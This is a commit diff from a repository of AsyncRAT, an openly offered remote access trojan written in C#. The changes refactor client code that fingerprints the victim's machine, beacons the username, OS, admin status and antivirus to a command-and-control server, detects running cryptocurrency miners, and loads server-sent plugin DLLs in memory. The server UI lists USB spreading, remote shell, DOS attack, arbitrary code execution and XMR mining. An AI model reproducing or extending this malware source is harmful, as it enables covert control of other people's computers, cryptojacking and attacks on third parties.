Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source
This commit is contained in:
NYAN CAT 2019-10-06 11:02:41 +03:00
parent 0d0f0792d7
commit 78c6cc75b2
13 changed files with 1242 additions and 1170 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
AsyncRAT-C#/Client/Client.csproj
View File

@ -77,7 +77,11 @@
<Compile Include="Algorithm\Zip.cs" />
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Helper\Anti_Analysis.cs" />
<Compile Include="Helper\CheckMiner.cs" />
<Compile Include="Helper\HwidGen.cs" />
<Compile Include="Helper\IdSender.cs" />
<Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\MutexControl.cs" />
<Compile Include="Helper\ProcessCritical.cs" />
<Compile Include="Helper\SetRegistry.cs" />
<Compile Include="Install\NormalStartup.cs" />

4
AsyncRAT-C#/Client/Connection/ClientSocket.cs
View File

@ -88,7 +88,7 @@ namespace Client.Connection
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
Buffer = new byte[4];
MS = new MemoryStream();
Send(Methods.SendInfo());
Send(IdSender.SendInfo());
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
}
@ -239,7 +239,7 @@ namespace Client.Connection
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)Methods.TheCPUCounter.NextValue()}% RAM {(int)Methods.TheMemCounter.NextValue()}%";
msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)IdSender.TheCPUCounter.NextValue()}% RAM {(int)IdSender.TheMemCounter.NextValue()}%";
Send(msgpack.Encode2Bytes());
GC.Collect();
}

2
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -37,7 +37,7 @@ namespace Client.Handle_Packet
Assembly assembly = AppDomain.CurrentDomain.Load(Zip.Decompress(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString)))));
Type type = assembly.GetType("Plugin.Plugin");
dynamic instance = Activator.CreateInstance(type);
instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install);
instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), MutexControl.currentApp, Settings.MTX, Settings.BDOS, Settings.Install);
break;
}

41
AsyncRAT-C#/Client/Helper/CheckMiner.cs Normal file
View File

@ -0,0 +1,41 @@
using System.Diagnostics;
using System.Linq;
using System.Management;
namespace Client.Helper
{
class CheckMiner
{
public string GetProcess()
{
foreach (var process in Process.GetProcesses())
{
try
{
if (GetCommandLine(process).ToLower().Contains("--donate-level="))
{
SetRegistry.SetValue(Settings.Hwid, "1");
return "1";
}
}
catch { }
}
SetRegistry.SetValue(Settings.Hwid, "0");
return "0";
}
public string GetCommandLine(Process process)
{
try
{
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT CommandLine FROM Win32_Process WHERE ProcessId = " + process.Id))
using (ManagementObjectCollection objects = searcher.Get())
{
return objects.Cast<ManagementBaseObject>().SingleOrDefault()?["CommandLine"]?.ToString();
}
}
catch { }
return "";
}
}
}

37
AsyncRAT-C#/Client/Helper/HwidGen.cs Normal file
View File

@ -0,0 +1,37 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
namespace Client.Helper
{
public static class HwidGen
{
public static string HWID()
{
try
{
return GetHash(string.Concat(Environment.ProcessorCount, Environment.UserName,
Environment.MachineName, Environment.OSVersion
, new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize));
}
catch
{
return "Err HWID";
}
}
public static string GetHash(string strToHash)
{
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 20).ToUpper();
}
}
}

34
AsyncRAT-C#/Client/Helper/IdSender.cs Normal file
View File

@ -0,0 +1,34 @@
using Client.MessagePack;
using Microsoft.VisualBasic.Devices;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
namespace Client.Helper
{
public class IdSender
{
public static PerformanceCounter TheCPUCounter { get; } = new PerformanceCounter("Processor", "% Processor Time", "_Total");
public static PerformanceCounter TheMemCounter { get; } = new PerformanceCounter("Memory", "% Committed Bytes In Use");
public static byte[] SendInfo()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
msgpack.ForcePathObject("HWID").AsString = Settings.Hwid;
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " +
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
TheCPUCounter.NextValue();
msgpack.ForcePathObject("Performance").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%";
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus();
return msgpack.Encode2Bytes();
}
}
}

77
AsyncRAT-C#/Client/Helper/Methods.cs
View File

@ -1,68 +1,15 @@
using Client.MessagePack;
using Client.Connection;
using Microsoft.VisualBasic.Devices;
using Client.Connection;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Net.Sockets;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
using System.Threading;
using System.Drawing.Imaging;
using System.Runtime.InteropServices;
using System.Linq;
namespace Client.Helper
{
static class Methods
{
public static PerformanceCounter TheCPUCounter { get; } = new PerformanceCounter("Processor", "% Processor Time", "_Total");
public static PerformanceCounter TheMemCounter { get; } = new PerformanceCounter("Memory", "% Committed Bytes In Use");
public static string HWID()
{
try
{
return GetHash(string.Concat(Environment.ProcessorCount, Environment.UserName,
Environment.MachineName, Environment.OSVersion
, new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize));
}
catch
{
return "Err HWID";
}
}
public static string GetHash(string strToHash)
{
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 20).ToUpper();
}
public static Mutex _appMutex;
public static bool CreateMutex()
{
bool createdNew;
_appMutex = new Mutex(false, Settings.MTX, out createdNew);
return createdNew;
}
public static void CloseMutex()
{
if (_appMutex != null)
{
_appMutex.Close();
_appMutex = null;
}
}
{
public static bool IsAdmin()
{
return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
@ -73,7 +20,7 @@ namespace Client.Helper
{
if (Convert.ToBoolean(Settings.BDOS) && IsAdmin())
ProcessCritical.Exit();
CloseMutex();
MutexControl.CloseMutex();
ClientSocket.SslClient?.Close();
ClientSocket.TcpClient?.Close();
}
@ -101,24 +48,6 @@ namespace Client.Helper
}
}
public static byte[] SendInfo()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
msgpack.ForcePathObject("HWID").AsString = Settings.Hwid;
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " +
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
TheCPUCounter.NextValue();
msgpack.ForcePathObject("Performance").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%";
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Antivirus();
return msgpack.Encode2Bytes();
}
public static ImageCodecInfo GetEncoder(ImageFormat format)
{
ImageCodecInfo[] codecs = ImageCodecInfo.GetImageDecoders();

26
AsyncRAT-C#/Client/Helper/MutexControl.cs Normal file
View File

@ -0,0 +1,26 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading;
namespace Client.Helper
{
public static class MutexControl
{
public static Mutex currentApp;
public static bool CreateMutex()
{
currentApp = new Mutex(false, Settings.MTX, out bool createdNew);
return createdNew;
}
public static void CloseMutex()
{
if (currentApp != null)
{
currentApp.Close();
currentApp = null;
}
}
}
}

4
AsyncRAT-C#/Client/Program.cs
View File

@ -23,7 +23,7 @@ namespace Client
try
{
if (!Methods.CreateMutex())
if (!MutexControl.CreateMutex())
Environment.Exit(0);
if (Convert.ToBoolean(Settings.Anti))
@ -36,6 +36,8 @@ namespace Client
ProcessCritical.Set();
Methods.PreventSleep();
new CheckMiner().GetProcess();
}
catch { }

6
AsyncRAT-C#/Client/Settings.cs
View File

@ -13,7 +13,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
public static string Version = "0.5.4";
public static string Version = "0.5.4D";
public static string Install = "false";
public static string InstallFolder = "AppData";
public static string InstallFile = "Test.exe";
@ -26,7 +26,7 @@ namespace Client
public static Aes256 aes256 = new Aes256(Key);
public static string Pastebin = "null";
public static string BDOS = "false";
public static string Hwid = Methods.HWID();
public static string Hwid = HwidGen.HWID();
#else
public static string Ports = "%Ports%";
@ -65,7 +65,7 @@ namespace Client
Pastebin = aes256.Decrypt(Pastebin);
Anti = aes256.Decrypt(Anti);
BDOS = aes256.Decrypt(BDOS);
Hwid = Methods.HWID();
Hwid = HwidGen.HWID();
Serversignature = aes256.Decrypt(Serversignature);
ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate)));
return VerifyHash();

28
AsyncRAT-C#/Server/Forms/Form1.Designer.cs generated
View File

@ -157,7 +157,7 @@
this.listView1.Name = "listView1";
this.listView1.ShowGroups = false;
this.listView1.ShowItemToolTips = true;
this.listView1.Size = new System.Drawing.Size(1320, 440);
this.listView1.Size = new System.Drawing.Size(1354, 440);
this.listView1.TabIndex = 0;
this.listView1.UseCompatibleStateImageBehavior = false;
this.listView1.View = System.Windows.Forms.View.Details;
@ -371,7 +371,7 @@
//
this.botsKillerToolStripMenuItem.Image = global::Server.Properties.Resources.botkiller;
this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem";
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.botsKillerToolStripMenuItem.Text = "Bots Killer";
this.botsKillerToolStripMenuItem.Click += new System.EventHandler(this.BotsKillerToolStripMenuItem_Click);
//
@ -379,7 +379,7 @@
//
this.uSBSpreadToolStripMenuItem1.Image = global::Server.Properties.Resources.usb;
this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1";
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
this.uSBSpreadToolStripMenuItem1.Click += new System.EventHandler(this.USBSpreadToolStripMenuItem1_Click);
//
@ -387,7 +387,7 @@
//
this.seedTorrentToolStripMenuItem1.Image = global::Server.Properties.Resources.u_torrent_logo;
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
this.seedTorrentToolStripMenuItem1.Click += new System.EventHandler(this.SeedTorrentToolStripMenuItem1_Click_1);
//
@ -395,7 +395,7 @@
//
this.remoteShellToolStripMenuItem1.Image = global::Server.Properties.Resources.shell;
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
this.remoteShellToolStripMenuItem1.Click += new System.EventHandler(this.RemoteShellToolStripMenuItem1_Click_1);
//
@ -403,7 +403,7 @@
//
this.dOSAttackToolStripMenuItem.Image = global::Server.Properties.Resources.ddos;
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
this.dOSAttackToolStripMenuItem.Click += new System.EventHandler(this.DOSAttackToolStripMenuItem_Click_1);
//
@ -411,7 +411,7 @@
//
this.executeNETCodeToolStripMenuItem.Image = global::Server.Properties.Resources.coding;
this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem";
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code";
this.executeNETCodeToolStripMenuItem.Click += new System.EventHandler(this.ExecuteNETCodeToolStripMenuItem_Click_1);
//
@ -422,14 +422,14 @@
this.killToolStripMenuItem});
this.xMRMinerToolStripMenuItem.Image = global::Server.Properties.Resources.xmr;
this.xMRMinerToolStripMenuItem.Name = "xMRMinerToolStripMenuItem";
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.xMRMinerToolStripMenuItem.Text = "XMR Miner";
//
// runToolStripMenuItem
//
this.runToolStripMenuItem.Image = global::Server.Properties.Resources.tomem1;
this.runToolStripMenuItem.Name = "runToolStripMenuItem";
this.runToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.runToolStripMenuItem.Size = new System.Drawing.Size(152, 34);
this.runToolStripMenuItem.Text = "Run";
this.runToolStripMenuItem.Click += new System.EventHandler(this.RunToolStripMenuItem_Click);
//
@ -437,7 +437,7 @@
//
this.killToolStripMenuItem.Image = global::Server.Properties.Resources.stop__1_;
this.killToolStripMenuItem.Name = "killToolStripMenuItem";
this.killToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.killToolStripMenuItem.Size = new System.Drawing.Size(152, 34);
this.killToolStripMenuItem.Text = "Stop";
this.killToolStripMenuItem.Click += new System.EventHandler(this.KillToolStripMenuItem_Click);
//
@ -620,7 +620,7 @@
this.toolStripStatusLabel2});
this.statusStrip1.Location = new System.Drawing.Point(0, 479);
this.statusStrip1.Name = "statusStrip1";
this.statusStrip1.Size = new System.Drawing.Size(1334, 32);
this.statusStrip1.Size = new System.Drawing.Size(1368, 32);
this.statusStrip1.TabIndex = 1;
this.statusStrip1.Text = "statusStrip1";
//
@ -659,7 +659,7 @@
this.tabControl1.Location = new System.Drawing.Point(0, 0);
this.tabControl1.Name = "tabControl1";
this.tabControl1.SelectedIndex = 0;
this.tabControl1.Size = new System.Drawing.Size(1334, 479);
this.tabControl1.Size = new System.Drawing.Size(1368, 479);
this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
this.tabControl1.TabIndex = 2;
//
@ -669,7 +669,7 @@
this.tabPage1.Location = new System.Drawing.Point(4, 29);
this.tabPage1.Name = "tabPage1";
this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
this.tabPage1.Size = new System.Drawing.Size(1326, 446);
this.tabPage1.Size = new System.Drawing.Size(1360, 446);
this.tabPage1.TabIndex = 0;
this.tabPage1.Text = "Clients";
//
@ -904,7 +904,7 @@
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(1334, 511);
this.ClientSize = new System.Drawing.Size(1368, 511);
this.Controls.Add(this.tabControl1);
this.Controls.Add(this.statusStrip1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));

2147
AsyncRAT-C#/Server/Forms/Form1.cs
View File

File diff suppressed because it is too large Load Diff

2
AsyncRAT-C#/Server/Settings.cs
View File

@ -15,7 +15,7 @@ namespace Server
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.5.4C";
public static readonly string Version = "AsyncRAT 0.5.4D";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();